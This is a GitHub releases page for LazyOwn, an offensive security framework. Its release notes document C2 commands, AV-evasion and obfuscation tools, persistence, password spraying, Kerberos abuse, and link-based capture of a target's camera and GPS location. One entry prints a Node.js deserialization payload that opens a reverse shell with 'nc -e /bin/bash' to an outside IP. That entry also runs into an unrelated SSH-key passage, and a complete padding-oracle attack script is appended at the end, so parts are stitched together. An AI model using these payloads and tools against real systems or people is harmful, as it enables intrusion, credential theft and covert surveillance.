Releases: grisuno/LazyOwn

release/0.2.28

29 Jan 01:06
release/0.2.28
3fff1e7

What's Changed

Full Changelog: release/0.2.26...release/0.2.28

CCCAIPOWER

c2asm

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding
assembly code side by side. It allows the user to select a .c file from the
'sessions' directory and then displays the code with scrolling capabilities
both vertically and horizontally. A green vertical line separates the C code
from the ASM code.

Parameters:
stdscr (curses.window): The curses window object to draw on.

Returns:
None

view_code

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding
assembly code side by side. It allows the user to select a .c file from the
'sessions' directory and then displays the code with scrolling capabilities
both vertically and horizontally. A green vertical line separates the C code
from the ASM code.

Parameters:
stdscr (curses.window): The curses window object to draw on.

Returns:
None

camphish

Executes the camphish tool, which grabs camera shots from a target's phone front camera or PC webcam by sending a link.

This function:
- Installs camphish if not already installed.
- Executes the camphish command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and php to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
camphish

hound

Executes the Hound tool, a simple and light tool for information gathering that captures exact GPS coordinates.

This function:
- Installs hound if not already installed.
- Executes the hound command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and php to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
hound

ofuscatesh

Obfuscates a shell script by encoding it in Base64 and prepares a command to decode and execute it.

This function reads the content of a shell script file, encodes it in Base64, and constructs a command
that can be used to decode and execute the encoded script using echo and base64 -d.

Args:
line (str): The path to the shell script file to be obfuscated. If not provided, a default
path is obtained from the get_users_dic function.

Returns:
None

Example:
>>> ofuscatesh /path/to/script.sh or just ofuscatesh
# This will read the script, encode it in Base64, and prepare a command to decode and execute it.

load_session

Load the session from the sessionLazyOwn.json file and display the status of various parameters.

This command reads the sessionLazyOwn.json file from the sessions directory and displays the status
of parameters, credentials, hashes, notes, plan, id_rsa, implants, and redop.

:param line: Additional arguments (not used in this command)

lateral_mov_lin

Perform lateral movement by downloading and installing LazyOwn on a remote Linux machine.

This function automates the process of setting up an APT and PIP proxy, downloading the LazyOwn package,
transferring it to a remote machine, and installing it. The function ensures that all necessary directories
are created and that the package is correctly installed on the remote machine.

Parameters:
line (str): The command line input, which is not used in this function.

Returns:
None

release/0.2.26

17 Jan 20:47
release/0.2.26
ffc671a

What's Changed

  • new C2 with all the features... by @grisuno in #79

Full Changelog: release/0.2.25...release/0.2.26

atomic_lazyown

Generates and runs Atomic Red Team tests using the C2.

Parameters:
line (str): Space-separated list of technique IDs.

Returns:
None

upload_file_to_c2

Uploads a file to the C2.

Parameters:
file_path (str): Path of the file to upload.

Returns:
None

download_file_from_c2

Downloads a file from the C2.

Parameters:
file_name (str): Name of the file to download.
clientid (str): Client identifier (optional).

Returns:
None

issue_command_to_c2

Runs a command on the client using the C2.

Parameters:
command (str): Command to execute.

Returns:
None

ofuscatorps1

Obfuscates a PowerShell script using various techniques.
Based on Invoke-Stealth by @JoelGMSec (https://github.com/JoelGMSec/Invoke-Stealth/), rewritten in Python by grisun0.

This function:
- Displays a banner and help information if requested.
- Validates the provided parameters.
- Executes all obfuscation techniques on the input PowerShell script by default.
- Displays the result in the terminal.

Behavior:
- Requires python3 to be installed for certain techniques.
- Uses parameters from the command line for the script path and optional flags.

Usage:
ofuscatorps1 <script_path> [-nobanner]

Techniques:
- Chameleon: Substitute strings and concatenate variables.
- BetterXencrypt: Compresses and encrypts with random iterations.
- PyFuscation: Obfuscate functions, variables, and parameters.
- ReverseB64: Encode with base64 and reverse it to avoid detections.
- PSObfuscation: Convert content to bytes and compress with Gzip.
- All: Sequentially executes all techniques described above.

d3monizedshell

Executes the D3m0n1z3dShell tool for persistence in Linux.

This function:
- Installs D3m0n1z3dShell if not already installed.
- Executes the D3m0n1z3dShell command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and curl to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
d3monizedshell

scp

Copies the local "sessions" directory to a remote host using scp, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an scp command to deploy the "sessions" directory to the remote host.
4. Executes the scp command using the system shell.

Args:
line (str): Input command line (optional). The third parameter can be 'win' or 'lin' to specify the target OS.

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- scp must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

apt_proxy

Configures the local machine with internet access to act as an APT proxy for a machine without internet access.

Steps:
1. Installs and configures apt-cacher-ng on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

pip_proxy

Configures the local machine with internet access to act as a pip proxy for a machine without internet access.

Steps:
1. Installs and configures squid on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

internet_proxy

Configures the local machine with internet access to act as a proxy for a machine without internet access.

Steps:
1. Installs and configures squid on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

check_update

Checks for updates by comparing the local version with the remote version.

This function:
- Fetches the remote version from a JSON file hosted on GitHub.
- Reads the local version from a JSON file in the script's root directory.
- Compares the version numbers and determines if an update is needed.

Behavior:
- Requires requests library to fetch the remote version.
- Uses JSON parsing to extract version numbers.

Usage:
check_update

wmiexecpro

Executes wmiexec-pro with various options for WMI operations.

This function handles the installation of wmiexec-pro and its dependencies,
and allows the user to execute various WMI operations with minimal input.
It reads credentials from a specified file and constructs the necessary
commands to interact with the target system.

:param line: Command line input from the user. This input is used to
determine the module and action to be executed.
:returns: None

The function performs the following steps:

  1. Checks if wmiexec-pro and its dependencies are installed. If not, it
    installs them in specified directories.
  2. Reads credentials from a file.
  3. Constructs and executes the wmiexec-pro command based on user input.
  4. Enumerates available modules and actions for each module, allowing the
    user to select them interactively.
  5. Enumerates available options for each action, allowing the user to select
    them interactively.

Example usage:

do_wmiexecpro("enum -run")

This will execute the enumeration module with the -run action.

If no specific command is provided, the function will prompt the user to
select a module and action interactively.

create_session_json

Generates or updates a JSON file to be used as a database.

The JSON file will be named sessionLazyOwn_{timestamp}.json and will be stored
in the sessions directory. The JSON file will contain data from self.params
and additional data extracted from credentials*.txt and hash*.txt files.

The structure of the JSON file will be as follows:

  • params: Data from self.params.
  • credentials: A list of dictionaries containing usernames and passwords extracted
    from credentials*.txt files.
  • hashes: A list of dictionaries containing the contents of hash*.txt files.
  • notes: The content of the notes.txt file, if it exists.

Returns:
None

shellcode2elf

Convert shellcode into an ELF file and infect it.

This function takes an optional input line that specifies the name of the shellcode file.
If no input line is provided, a filename is generated based on the domain. The function reads
the shellcode and inserts it into a C source file, then compiles the source file into an ELF
file. It also creates an infected version of the ELF file and uploads all generated files to a
command and control (C2) server.

Args:
line (str): An optional input line that specifies the name of the shellcode file.

Returns:
None

ssh_cmd

Performs remote command execution through SSH using the grisun0 user; see help grisun0.

Parameters:
line (str): The command line input, i.e. the command to execute. If not provided, it defaults to whoami.

Returns:
None

clone_site

Clones a website and serves the files in sessions/{url_cloned}.

Args:
line (str): The input line containing the URL to clone.

Returns:
None

knokknok

Sends a special string to trigger a reverse shell; with the command 'c2 client_name', it
creates a listener shell script in python3 to drop the reverse shell.

Args:
line (str): Input line (not used).

Returns:
None

listener_go

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim.
The input should include the victim ID, the choice of listener type, and optionally the port numbers.
The function then constructs the appropriate command to start the listener and assigns the necessary
parameters.

Args:
line (str): The command line input containing the victim ID, listener type, and optional port numbers.

Returns:
None

Raises:
None

Example:
>>> listener_go victim1 2 1337 7777

listener_py

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim.
The input should include the victim ID, the choice of listener type, and optionally the port numbers.
The function then constructs the appropriate command to start the listener and assigns the necessary
parameters.

Args:
line (str): The command line input c...


release/0.2.25

23 Dec 03:43
release/0.2.25
6e733e6

What's Changed

Full Changelog: release/0.2.24...release/0.2.25

release/0.2.24

16 Dec 03:05
release/0.2.24
b3ef40f

What's Changed

Full Changelog: release/0.2.23...release/0.2.24

C2 New Look and HotFix Atomic RedTeam Path in C2

release/0.2.23

15 Dec 04:33
release/0.2.23
8eae5e7

What's Changed

Full Changelog: release/0.2.22...release/0.2.23

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function:
- Installs gMSADumper if not already installed.
- Executes the gMSADumper command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
gmsadumper -u <username> -p <password> -d <domain>
gmsadumper -u -p <LM:NT hash> -d -l <ldap_server>
gmsadumper -k -d -l <ldap_server>

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function:
- Installs DNSChef if not already installed.
- Executes the DNSChef command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets.

Actions: backupkey, blob, browser, certificates, credentials, machinecertificates, machinecredentials, machinemasterkeys, machinevaults, masterkeys, mobaxterm, rdg, sccm, vaults, wam, wifi

This function:
- Installs dploot if not already installed.
- Executes the dploot command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dploot -d <domain> -u <username> -p <password> -t <target>
dploot -k -d <domain> -t <target>

banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool (thanks to smokeme).

This function:
- Clones the payloadGenerator repository if not already cloned.
- Installs .NET Framework 4.5 if not already installed.
- Executes the generator.py script with the provided IP, port, and XOR key.
- Displays the result in the terminal.

Parameters:
line (str): Length of the XOR key.

Behavior:
- Requires git and dotnet to be installed.
- Uses parameters from self.params for IP, port, and XOR key.

Usage:
createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function:
- Reads a binary file and converts its contents to a shellcode string.
- Supports both C and Nim formats.
- Displays the result in the terminal and saves it to a file.

Behavior:
- Requires the filename, width, quotes, and format parameters.
- Uses default values if parameters are not provided.
- Uses parameters from self.params for filename, width, quotes, and format.

Usage:
bin2shellcode [<filename> [<width> [<quotes> [<format>]]]]

release/0.2.22

07 Dec 02:00
release/0.2.22
226aa62

What's Changed

Full Changelog: release/0.2.21...release/0.2.22

spraykatz

Executes the Spraykatz tool to retrieve credentials on Windows machines and large Active Directory environments.

This function:
- Installs Spraykatz if not already installed.
- Executes the Spraykatz command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, git, and nmap to be installed.
- Uses parameters from self.params for username, password, and target.

Usage:
spraykatz

caldera

Installs and starts the Caldera server.

This function:
- Clones the Caldera repository recursively.
- Installs the required dependencies.
- Optionally installs GoLang (1.19+).
- Starts the Caldera server with the provided parameters.

Behavior:
- Requires git, python3, and pip3 to be installed.
- Uses parameters from self.params for version/release.

Usage:
caldera

ntpdate

Synchronizes the system clock with a specified NTP server.

This method constructs the target NTP server address using the domain and subdomain
parameters. It then prompts the user to confirm or modify the target address.
Finally, it executes the ntpdate command to synchronize the system clock with
the specified NTP server.

:param line: The command line input (not used in this method).
:type line: str
:return: None

ticketer

Executes the Impacket ticketer tool to create a golden ticket.

This function performs the following actions:

  1. Checks if the target host is valid.
  2. Prompts the user for the NTLM hash, domain SID, domain name, DC IP, SPN, and username.
  3. Constructs and executes the Impacket ticketer command with the provided information.

Parameters:
line (str): A command argument to determine the authentication mode.
This parameter is not used in this function.

Returns:
None

links

Displays a list of useful links and allows the user to select and copy a link to the clipboard.

This function performs the following actions:

  1. Defines a list of links with their aliases.
  2. Filters the links based on the input line if provided.
  3. Displays the filtered links with their aliases and URLs.
  4. Prompts the user to select a link by entering the corresponding number.
  5. Copies the selected link to the clipboard.

Parameters:
line (str, optional): A string to filter the links. If provided, only the links containing
the string in their alias or URL will be displayed. Defaults to an empty string.

Returns:
None

rsync

Synchronizes the local "sessions" directory to a remote host using rsync, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an rsync command to deploy the "sessions" directory to the remote host.
4. Executes the rsync command using the system shell.

Args:
line (str): Input command line (not used in the current implementation).

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- rsync must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

pre2k

Executes the pre2k tool to query the domain for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

This function:
- Installs pre2k if not already installed.
- Executes the pre2k command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
pre2k auth -u <username> -p <password> -d <domain> -dc-ip <dc_ip>
pre2k unauth -d <domain> -dc-ip <dc_ip> -inputfile <hostnames_file>

release/0.2.21

25 Nov 06:54
release/0.2.21
dc4b8d4

What's Changed

Full Changelog: release/0.2.20...release/0.2.21

utf

Encode a given payload into UTF-16 escape sequences.

This function takes a payload string and encodes each character into its
UTF-16 hexadecimal escape sequence. If no payload is provided as input, it
prompts the user to enter one, with a default value of ' or 1=1-- -.

Parameters:
line (str): The input payload to encode. If empty, the user is prompted
to provide one interactively.

Returns:
None: The encoded payload is printed to the console.

dcomexec

Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

This function performs the following actions:

  1. Validates the target host (rhost) and domain parameters.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt,
    allows the user to select credentials, and constructs the dcomexec command using them.
  3. If the line argument is "hash", it searches for a hash file, prompts the user for a username, and
    constructs the dcomexec command using the hash.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

pip_repo

Sets up a local pip repository and serves it via an HTTP server for offline installations.

This function performs the following actions:

  1. Creates a directory for storing pip packages if it does not already exist.
  2. Downloads a predefined list of Python packages along with their dependencies to the repository directory.
  3. Organizes the downloaded packages into their respective directories.
  4. Starts an HTTP server to host the repository, allowing remote machines to install the packages.

The repository path is created under the sessions directory, and the packages are served using Python's
built-in HTTP server at port 8008.

Parameters:
line (str): Optional argument for the command. Not used in this implementation but retained for compatibility
with the cmd2 framework.

Returns:
None

apt_repo

Creates a local APT repository and serves it via a web server.

This function performs the following actions:

  1. Creates a directory for storing .deb packages.
  2. Downloads the specified APT packages and their dependencies into the repository.
  3. Generates the necessary APT repository indexes.
  4. Starts a web server to host the repository for remote clients.

Parameters:
line (str): A space-separated list of package names to include in the repository.

Returns:
None

httprobe

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

This function performs the following actions:

  1. Verifies if httprobe is installed; if not, it installs the tool automatically.
  2. Probes domains from the input file or standard input.
  3. Simplifies the user experience by minimizing required commands and leveraging self.params for defaults.

Parameters:
line (str): Optional command argument specifying the domain. If omitted, run httprobe with no arguments.
Example usage:
httprobe example.com

Returns:
None

eyewitness_py

Automates EyeWitness installation and execution without requiring user input.

This function installs EyeWitness if it is not already available, uses a default input file
(urls.txt), and applies standard configurations to execute a web enumeration task
automatically. No arguments or manual intervention are needed from the user.

Behavior:
- Installs EyeWitness if missing.
- Uses urls.txt as the default input file.
- Sets a default timeout of 60 seconds.
- Automatically executes EyeWitness with predefined settings.

Usage:
witness

pup

Processes HTML content from a specified URL using the pup utility and a default CSS selector.

This function:
- Retrieves HTML content from the URL stored in self.params["url"] using curl.
- Filters the HTML content using the pup utility with a predefined CSS selector.
- Displays the filtered result in the terminal.

Behavior:
- Requires pup to be installed.
- Uses self.params["url"] as the source URL.
- Applies the CSS selector 'table table tr:nth-last-of-type(n+2) td.title a' by default.

Usage:
pup

recon

Performs reconnaissance on a specified domain using crt.sh (the target must be visible on internet), pup, httprobe, and EyeWitness.

This function automates the process of gathering subdomains for a given domain, verifying
their reachability, and generating a report using the EyeWitness tool.

Workflow:
1. Determines the target domain from the line argument or defaults to self.params["domain"].
2. Queries the crt.sh certificate transparency logs for subdomains using curl.
3. Filters and extracts domain-related text data using pup.
4. Sorts and removes duplicate entries, then validates subdomains with httprobe.
5. Saves the results to a temporary file.
6. Executes EyeWitness to generate a web-based reconnaissance report for the subdomains.

Requirements:
- pup: A command-line HTML parser.
- httprobe: A tool to check live HTTP/HTTPS endpoints.
- EyeWitness: A tool for generating web reconnaissance reports.

Parameters:
line (str): The domain to target for reconnaissance. If omitted, the domain defaults to self.params["domain"].

Examples:
1. Specify a domain directly:
>>> recon domain.com

2. Use the default domain from self.params:
    >>> recon

Raises:
None. Errors in execution will be logged or printed as part of the command output.

digdug

Executes Dig Dug to inflate the size of an executable file, leveraging pre-configured settings
and interactive input for minimal user effort.

This function integrates with the Dig Dug tool to increase an executable's size by appending
dictionary words. It automates repository setup, selects the input file from user prompts or defaults,
and uses sensible configurations to execute the inflation process. Dig Dug is particularly useful
for evading AV/EDR detections by exceeding size thresholds for analysis.

Behavior:
- Automatically clones the Dig Dug repository if not already present in external/.exploit/DigDug.
- Calls the venom command to prepare the necessary payloads for execution.
- Prompts the user to select an input executable and specify the desired size increase.
- Uses a default dictionary (google-10000-english-usa-gt5.txt) for padding.

Requirements:
- A Python environment with required dependencies.
- Executable files available in the working directory or sessions.

Usage:
Invoke this function to inflate the size of a generated payload or user-specified executable.
Interactive prompts will guide the input selection and size configuration.

Examples:
1. Increase the size of a selected payload by 100 MB:
>>> digdug

2. Use the default configurations to inflate an executable:
    No additional parameters are required. The user is prompted for size and file selection.

adsso_spray

Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

This function automates the process of spraying a given password across multiple user accounts in a target domain. It utilizes
a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to
a specified output file, providing insights into which accounts were successful or failed during the attack.

Requirements:
- A valid domain and URL for the target Azure AD instance (assign url https://url.com).
- A user dictionary file containing usernames (without the domain) to be sprayed.

Parameters:
line (str): Command-line input passed to the function (not currently used in the function).

Behavior:
- Loads the domain and URL from the configuration stored in self.params.
- Reads the user list from a file specified in get_users_dic.
- Sprays the specified password to all users and processes the results.
- Saves the successful and failed attempts to the output file.

Example:
- Perform a password spray attack with the password "admin" and save the results:
>>> adsso_spray
- Customize the password or user list by modifying self.params before invoking the function.

creds_py

Searches for default credentials associated with a specific product or vendor, using the Default Credentials Cheat Sheet.

This function automates the process of querying the Default Credentials Cheat Sheet for default credentials of various products.
It searches for the specified product or vendor, providing relevant default credentials for pentesters during engagements.

Behavior:
- Automatically clones the Default Credentials Cheat Sheet repository if not already present in external/.exploit/DefaultCreds.
- Executes a search command with the product/vendor specified by the user.
- Returns the default credentials for the requested product or vendor.

Requirements:
- Python environment with necessary dependencies.
- Access to the Default Credentials Cheat Sheet repository.

Usage:
Run this function to search for default credentials related to a product or vendor.
The user is p...


release/0.2.20

21 Nov 01:48
release/0.2.20
fc410d8

What's Changed

Full Changelog: release/0.2.19...release/0.2.20

getnthash_py

Executes the getnthash.py tool from PKINITtools to retrieve the NT hash using a Kerberos U2U TGS request.

This function performs the following actions:

  1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
  2. Retrieves the NT hash by requesting a U2U service ticket for the account and decrypting it with the AS-REP encryption key obtained when the TGT was requested via PKINIT.

Parameters:
line (str): Command arguments specifying the AS-REP key and target identity.
Expected format:
- identity
- Additional flags like -key KEY, -dc-ip ip address, etc.

Returns:
None

gets4uticket_py

Executes the gets4uticket.py tool from PKINITtools to request an S4U2Self service ticket using Kerberos.

This function performs the following actions:

  1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
  2. Requests a service ticket using the S4U2Self protocol and outputs it to the specified ccache file.

Parameters:
line (str): Command arguments specifying the kerberos_connection_url, SPN, target user, and ccache.
Expected format:
- kerberos_connection_url spn targetuser ccache
- Additional flags like -v for verbose output.

Returns:
None

aclpwn_py

Executes the aclpwn.py tool to find and exploit ACL paths for privilege escalation in an Active Directory environment.

This function performs the following actions:

  1. Checks if aclpwn is installed; if not, it installs the package.
  2. Finds an exploit path using specified starting and target points in Active Directory.
  3. Executes the path to escalate privileges if the path is found.

Parameters:
line (str): Command arguments specifying the find and target points, domain, and optional flags.
Expected format:
- -f starting_point -ft starting_type -d domain
- Additional flags like -t target, -tt target_type, --server, -dry, --restore, etc.

Returns:
None

addspn_py

Executes the addspn.py tool to manage Service Principal Names (SPNs) on Active Directory accounts via LDAP.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Adds, removes, or queries SPNs on the specified target based on the provided options.

Parameters:
line (str): Command arguments specifying the target hostname, user credentials, and SPN actions.
Expected format:
- hostname user password target spn -options
- Options include:
- -r to remove an SPN
- -q to query current SPNs
- -a to add SPN via msDS-AdditionalDnsHostName

Returns:
None

dnstool_py

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Modifies DNS records by adding, removing, or querying based on the specified options.

Parameters:
line (str): Command arguments specifying the DNS action, target record, and data.
Expected format:
- hostname user password record action -options
- Options include:
- -a to add a record
- -r to remove a record
- --forest to target ForestDnsZones

Returns:
None

printerbug_py

Executes the printerbug.py tool to trigger the SpoolService bug, coercing the target's print spooler into authenticating back to the attacker host (RPC backconnect).

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Executes the printerbug tool to attempt an RPC backconnect to the specified attacker host.

Parameters:
line (str): Command arguments specifying the target and attacker host.
Expected format:
- target_username@target_host attacker_host

Returns:
None

krbrelayx_py

Executes the krbrelayx.py tool for Kerberos relaying or unconstrained delegation abuse.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Relays Kerberos tickets or abuses unconstrained delegation to access target services.

Parameters:
line (str): Command arguments specifying the target and options.
Expected format:
- target options
- Options include:
- -t target_host to specify the target host
- -l loot directory to save TGTs or dump information

Returns:
None

autoblody

Executes the autobloody tool for automating Active Directory privilege escalation paths.

This function performs the following actions:

  1. Checks if autobloody is installed; if not, it clones the repository and installs dependencies.
  2. Executes the autobloody command to find and exploit privilege escalation paths.

Parameters:
line (str): Command arguments specifying the source and target objects and options.
Expected format:
- -u username for NTLM authentication
- -p password for NTLM authentication
- --host domain_controller_ip for the IP of the Domain Controller
- -dp neo4j_password for Neo4j database password
- -ds source_label for the source node label in BloodHound
- -dt target_label for the target node label in BloodHound

Returns:
None

upload_gofile

Uploads a file to Gofile storage.

This function performs the following actions:

  1. Prepares the file and folder ID for upload.
  2. Sends a POST request to Gofile API with the file and authorization token.
  3. Handles the response from the API and prints the result.

Parameters:
line (str): Command arguments specifying the file path and options.
Expected format:
- <file_path>
- Options include:
- --folderId <folder_id> to specify the folder where the file should be uploaded

Returns:
None

unicode_WAFbypass

Opens a Netcat listener on port 443 and attempts to exploit a Node.js (node-serialize) deserialization flaw by sending the following payload:

{"rce":"_$$ND_FUNC$$_function() {require('child_process').exec('nc -e /bin/bash 10.10.xx.xx 443',function(error,stdout,stderr) {console.log (stdout) });}()"}

Some WAFs can be bypassed by writing the keywords in the payload as Unicode escapes (\uXXXX): the server's JSON.parse decodes the escapes before the function body is evaluated, so the request body no longer contains strings such as "require" or "child_process" while the server still runs the original code.

Generate an obfuscated payload, encode it in base64, and append the SSH public key to the authorized_keys file.

Args:
    ip_address (str): The IP address for the reverse shell connection.
    port (int): The port for the reverse shell connection.
    ssh_public_key (str): The SSH public key to add to authorized_keys.

Returns:
    str: The base64-encoded obfuscated payload.

sqli_mssql_test

Initiates a reverse MSSQL shell by starting an HTTP server to handle incoming connections and exfiltrate data.

This function does the following:

  1. Starts an HTTP server to listen for connections from the MSSQL server.
  2. Intercepts and decodes responses from the target server.
  3. Prompts the user to enter commands, sends them to the target, and displays the output.

Parameters:
line (str): Unused command argument from the cmd2 prompt.

Returns:
None

targetedKerberoas

Executes the targetedKerberoast tool to request Kerberos service tickets for accounts with an SPN and dump them in a crackable hash format.

This function performs the following actions:

  1. Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies.
  2. Prompts for parameters such as the domain, username, and other configurations required by targetedKerberoast.
  3. Executes the targetedKerberoast tool with specified options for obtaining "kerberoastable" hashes.

Parameters:
line (str): Command arguments specifying the user, domain, and options.
Expected format:
- domain user hash or password [optional parameters]

Returns:
None

pyoracle2

Executes the pyOracle2 tool for performing padding oracle attacks.

This function performs the following actions:

  1. Verifies the presence of the pyOracle2 tool; if not installed, it clones the repository and installs dependencies.
  2. Prompts the user for configuration parameters or retrieves them from self.params to create a job-specific configuration file.
  3. Executes the pyOracle2 tool using the generated configuration file and specified options.

Parameters:
line (str): Command arguments specifying additional tool options if required.
Expected format: [optional parameters]

Returns:
None
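What pyOracle2 automates, written out as an added Python example (not pyOracle2's code and not LazyOwn's): a CBC padding-oracle attack that recovers plaintext from nothing but the oracle's valid/invalid-padding answer. It runs offline against a local oracle built on a toy Feistel block cipher (assumed here to keep the example dependency-free; a real target would use AES, which changes nothing in the attack), and it handles the classic edge case where the last byte's first "valid" hit is a \x02\x02 ending rather than \x01.

```python
import hashlib
import os
from typing import Callable

BLOCK, ROUNDS = 16, 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy 128-bit Feistel block cipher keyed through SHA-256, used only so the
# example runs without a crypto library. The attack treats it as a black box,
# exactly as it would treat AES behind a real oracle.
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def pad(data: bytes) -> bytes:                     # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def valid_padding(data: bytes) -> bool:
    n = data[-1] if data else 0
    return 1 <= n <= BLOCK and data.endswith(bytes([n]) * n)


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev, pt = b"", iv, pad(plaintext)
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt_raw(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


def make_oracle(key: bytes) -> Callable[[bytes], bool]:
    """The server-side bug: it reveals whether decryption yielded valid padding."""
    return lambda iv_ct: valid_padding(cbc_decrypt_raw(key, iv_ct[:BLOCK], iv_ct[BLOCK:]))


def padding_oracle_decrypt(oracle: Callable[[bytes], bool], iv: bytes, ct: bytes) -> bytes:
    """Recover the plaintext of iv||ct using only the oracle's yes/no answers."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                     # D_key(cur), found byte by byte
        for j in range(BLOCK - 1, -1, -1):
            padv = BLOCK - j                         # padding value we aim for
            forged = bytearray(BLOCK)
            for k in range(j + 1, BLOCK):            # bytes already known -> padv
                forged[k] = inter[k] ^ padv
            for guess in range(256):
                forged[j] = guess
                if not oracle(bytes(forged) + cur):
                    continue
                if j == BLOCK - 1:
                    # A hit on the last byte may be \x02\x02 (or longer) rather
                    # than \x01; disturbing byte 14 breaks those but not \x01.
                    probe = bytearray(forged)
                    probe[j - 1] ^= 0xFF
                    if not oracle(bytes(probe) + cur):
                        continue
                inter[j] = guess ^ padv
                break
            else:
                raise RuntimeError("oracle accepted no guess; is it really a padding oracle?")
        plain += _xor(bytes(inter), prev)
    return plain[:-plain[-1]]


if __name__ == "__main__":
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)
    secret = b"user=guest;role=admin;exp=2030"       # constructed plaintext
    ct = cbc_encrypt(key, iv, secret)
    print(padding_oracle_decrypt(make_oracle(key), iv, ct))
```

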